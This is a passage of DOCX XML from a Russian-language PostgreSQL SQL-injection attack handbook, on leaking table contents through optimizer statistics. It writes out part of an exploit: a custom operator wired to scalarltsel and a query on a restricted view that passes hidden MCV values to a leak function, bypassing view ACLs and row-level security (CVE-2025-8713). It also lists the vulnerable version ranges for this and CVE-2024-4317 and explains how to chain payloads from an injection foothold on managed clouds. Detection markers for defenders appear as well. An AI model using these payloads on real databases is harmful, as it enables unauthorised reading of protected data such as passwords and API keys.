          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RESTRICT = scalarltsel</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Использование на ограниченном view (или RLS-таблице):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT count(*) FROM restricted_view WHERE protected_col &lt;&lt;&lt;&lt; 'anything';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда planner оценивает selectivity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">restricted_view.protected_col &lt;&lt;&lt;&lt; 'anything'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, он вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scalarltsel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (стандартная функция оценки селективности) — а внутри неё происходит обращение к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic.stavaluesN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> underlying таблицы. До патча selectivity-оценщики не валидировали, что текущая роль имеет право видеть эти значения — функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.leak(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вызывалась с реальными values из MCV underlying-таблицы, минуя view-ACL и RLS-политики.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В контексте SQLi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload требует, чтобы атакующий уже мог выполнить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OPERATOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (требует CREATE на схеме). Это значит, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сам по себе из чистой SELECT-инъекции R26 не эксплуатируется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нужна пара 3.13 (получить CREATE) → 3.8.6 Payload C. На managed-провайдерах, где application-роль обычно имеет CREATE на public, цепочка часто закрывается одним шагом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативная форма R26 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">существующий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> custom operator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кастомные через pg_trgm и т.п.). Если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уже есть operator от расширения, атакующий может его использовать без CREATE. Список доступных через 3.8.4 Payload C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Детальный разбор R26 — в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Утечка фрагментов содержимого таблиц через optimizer statistics в трёх формах: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Top-N значений (MCV)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для колонок с низкой/средней кардинальностью реально равно «список существующих значений». Особенно опасно для: enum-подобных колонок (статусы, типы, флаги), которые часто описывают бизнес-логику; колонок с малым словарём (страны, языки, email-домены, префиксы токенов); колонок с deduplicated данными (boolean-флаги, NULL/значение).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Гистограмма (histogram_bounds)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — квантили: для timestamp-колонок даёт диапазон дат активности; для numeric — диапазон цен/балансов; для id — диапазон существующих идентификаторов. Не leak уникальных значений, но даёт картину распределения, по которой подбор векторов становится точнее.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n_distinct и null_frac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — количество уникальных значений (приблизительно) и доля NULL. Само по себе не утечка значений, но сигнализирует, на какие колонки имеет смысл идти за полной выборкой.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На непатченных версиях (R17/R26)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же самое, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без необходимости иметь SELECT на колонку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: обход ACL и RLS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Чувствительные данные через MCV-канал утекают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">массово</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если разработчик нарушил best practice — например, хранил пароли в plain text (рара ныне, но встречается в legacy и в test-данных, которые иногда попадают в production-кластеры). MCV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password = {123456, password, qwerty, letmein, ...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это сразу top-10 паролей в кластере без перебора hash-ей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Почему это работает.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pg_statistic</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pg_statistic_ext_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — реальные таблицы в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SELECT на них REVOKE от PUBLIC, оставлен только superuser. Это сделано осознанно, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">stavaluesN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит сырые значения колонок.</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 views поверх них с WHERE-фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">has_column_privilege(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Идея: показать роли статистику только тех колонок, на которые она имеет SELECT.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CVE-2024-4317 (R17):</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фильтр был реализован только частично — для одних колонок view, но не для других (включая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Атакующий читает все строки view, для запрещённых колонок получает данные. Фикс — пересоздание view с правильным фильтром в каждой колонке. Делается через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">отдельный SQL-скрипт `fix-CVE-2024-4317.sql`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (поставляется с патчем); сам по себе бинар-апгрейд view не трогает.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CVE-2025-8713 (R26):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> selectivity-оценщики (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scalarltsel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eqsel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и т.п.) при оценке custom operator получали значения из MCV underlying-таблицы и передавали их в pluggable-функцию custom operator-а. До патча эти значения не валидировались на права. Фикс — selectivity-оценщики теперь проверяют права роли на колонку перед передачей MCV в custom function.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`has_column_privilege(role, table, column, 'SELECT')`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный механизм PG для per-column ACL. В обоих CVE регрессия — view забывал вызвать эту функцию или вызывал её для не тех колонок.</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> см. каждый payload отдельно. Payload A работает везде. Payload B — до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Payload C — до фиксов 17.6/16.10/15.14/14.19/13.22 (август 2025).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 требуются для A/B. Payload C удобнее с pg_trgm или другим расширением, дающим custom operator, иначе нужен CREATE.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на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views. Payload B обходит ACL колонок. Payload C обходит view-ACL и RLS. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.0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Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не влияют. ANALYZE и autovacuum-расписание влияют только на свежесть статистики.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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читают: pganalyze / pgwatch / pgmustard и аналогичные инструменты query-планнинга/оптимизации — регулярные запросы каждые 1-5 минут от выделенной monitoring-роли. Атака — единичный запрос от application-роли, особенно с конкретным WHERE по чувствительной таблице (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tablename = 'users'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'api_keys'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'payments'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DBA при ручной оптимизации запросов смотрит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для конкретной колонки — это разовые ad-hoc запросы из psql, не из application.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 почти не используется в legitimate коде; CREATE STATISTICS делает DBA при тюнинге, чтение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 почти всегда либо monitoring-роль, либо атака.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Маркер атаки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$1, attname, most_common_vals::text FROM pg_stats WHERE ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от application-роли — характерный отпечаток. От monitoring-роли — норма; от application — атака.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Custom operator из application-роли (Payload C) — однозначная атака. Application-код не создаёт операторов и не использует exotic-операторы в WHERE.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pg_stat_user_functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если включён) покажет высокую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">total_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для custom selectivity-функций — индикатор Payload C-стиля эксплуатации.</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A:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> все поддерживаемые PG (12–17).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B (R17 CVE-2024-4317):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает на 14.0–14.11, 15.0–15.6, 16.0–16.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">И на «патченных» кластерах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если не выполнен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в каждой БД (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template0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template1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — иначе новые БД создаются с уязвимым view-определением).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C (R26 CVE-2025-8713):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает на 13.0–13.21, 14.0–14.18, 15.0–15.13, 16.0–16.9, 17.0–17.5.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R17 на managed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS RDS / Cloud SQL / Supabase — патч бинаря применяется автоматически (provider-managed minor upgrades), но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исторически </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не выполнялся автоматически</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ни одним из major-провайдеров. Это значит: на managed-PG, апгрейднутом с уязвимой версии, дыра может оставаться открытой даже на актуальном minor — нужна явная проверка через попытку Payload B. (Provider-side advisory от RDS и Cloud SQL рекомендовал ручной запуск скрипта; не все клиенты это сделали.)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R26 на managed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> фикс через бинарь, применяется provider-side при minor upgrade. На managed обычно патч-окно = недели после release, инстансы на стороне клиента остаются уязвимыми, пока maintenance window не наступит.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Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Полные advisory-блоки и хронология — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 (R17, 2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 (R26, 2025)</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3.17.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Optimizer stats обходят ACL и RLS. 3.17.4 разбирает тот же класс CVE (R26) с точки зрения RLS-моделирования: какие политики обходятся через optimizer, как защититься. 3.8.6 — про утечку данных через статистику в принципе; 3.17.4 — про RLS-aspect.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3.8.3</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pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
